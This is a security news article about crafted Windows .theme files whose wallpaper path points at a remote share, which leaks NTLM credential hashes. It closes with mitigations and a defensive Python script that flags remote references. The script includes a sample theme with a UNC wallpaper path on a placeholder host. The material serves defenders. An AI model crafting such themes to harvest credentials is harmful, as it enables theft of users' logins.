Windows allows users to create custom themes that define the colors, sounds, mouse cursors, and wallpaper the operating system uses.
Windows users can then switch between themes to change the look of the operating system.
A theme's settings are saved in the folder `%AppData%\Microsoft\Windows\Themes` as a file with a .theme extension (e.g. "Custom Dark.theme").
These desktop theme packages can then be distributed via e-mail or as downloads on websites and installed simply by double-clicking on them.
But security researcher Jimmy Bayne (@bohops) revealed that specially crafted Windows themes can be used to carry out Pass-the-Hash attacks.
Pass-the-Hash attacks are used to steal Windows credentials (login names and password hashes) by tricking the user into connecting to a remote file-sharing server that requires authentication.
When it tries to access that remote resource, Windows automatically attempts to log in by sending the user's login name and an NTLM hash of the password.
In a Pass-the-Hash attack, the credentials sent this way are collected by the attackers, who then try to crack the hash to recover the user's login name and password.
Cracking a weak password can be done in a matter of seconds.
In the new method discovered by Bayne, an attacker creates a specially crafted .theme file whose desktop wallpaper setting points at a remote resource that requires authentication.
The user's credentials are then sent in the manner described above. The attacker can collect them and crack the hashes using purpose-built scripts.
As Microsoft moves Windows 10 away from local accounts, remote intruders can use this attack to gain easier access to the thousands of remote services Microsoft offers.
This could include remote access to e-mail, Azure, or corporate networks.
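As an added example (not part of the original article or Bayne's research), the following Python script parses a .theme file, which uses INI syntax with the wallpaper stored under the `[Control Panel\Desktop]` section, and flags any value that points at a remote location (a UNC share or a URL), which is the pattern a defender would look for before allowing a theme onto a machine. The sample theme text is constructed, and the host address in it is a documentation placeholder.

```python
import configparser
import re
from typing import List, Tuple

# Constructed sample of a .theme file. The Wallpaper entry points at a remote
# share (placeholder address), which is the pattern the article describes.
SAMPLE_THEME = r"""[Theme]
DisplayName=Custom Dark

[Control Panel\Desktop]
Wallpaper=\\203.0.113.10\share\wallpaper.jpg
TileWallpaper=0
WallpaperStyle=10

[Control Panel\Cursors]
Arrow=%SystemRoot%\cursors\aero_arrow.cur
"""

# A value that makes Windows reach out to another host: a UNC path (\\host\share,
# including the \\?\UNC\ form, which also starts with two backslashes) or a URL.
REMOTE_PATH = re.compile(r"^\s*(\\\\|//|[a-z][a-z0-9+.\-]*://)", re.IGNORECASE)


def find_remote_references(theme_text: str) -> List[Tuple[str, str, str]]:
    """Return (section, key, value) for every setting that points off-host."""
    # interpolation=None: theme values contain '%SystemRoot%' style tokens.
    # strict=False: real theme files sometimes repeat keys.
    parser = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    parser.optionxform = str  # keep key names exactly as written in the file
    parser.read_string(theme_text)
    hits = []
    for section in parser.sections():
        for key, value in parser.items(section):
            if REMOTE_PATH.match(value):
                hits.append((section, key, value))
    return hits


def is_suspicious(theme_text: str) -> bool:
    """True if any theme setting would trigger a connection to a remote host."""
    return bool(find_remote_references(theme_text))


def load_theme(path: str) -> str:
    """Read a .theme file from disk; Windows often writes them as UTF-16 with a BOM."""
    data = open(path, "rb").read()
    encoding = "utf-16" if data[:2] in (b"\xff\xfe", b"\xfe\xff") else "utf-8"
    return data.decode(encoding, errors="replace")


if __name__ == "__main__":
    for section, key, value in find_remote_references(SAMPLE_THEME):
        print(f"remote reference in [{section}] {key}={value}")
```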
Bayne said he reported the attack to Microsoft earlier this year, but was told it would not be fixed, as it is "design-specific".
Windows malware protection
Bayne recommended blocking the .theme, .themepack and .desktopthemepackfile extensions. However, this disables Windows 10 Themes, so users should only do this if they do not need to switch themes.
Windows 10 users can also set the policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to "Deny All" to prevent NTLM credentials from being sent to remote systems.
Finally, enabling multi-factor authentication on Microsoft accounts is good practice to prevent third parties from accessing the account.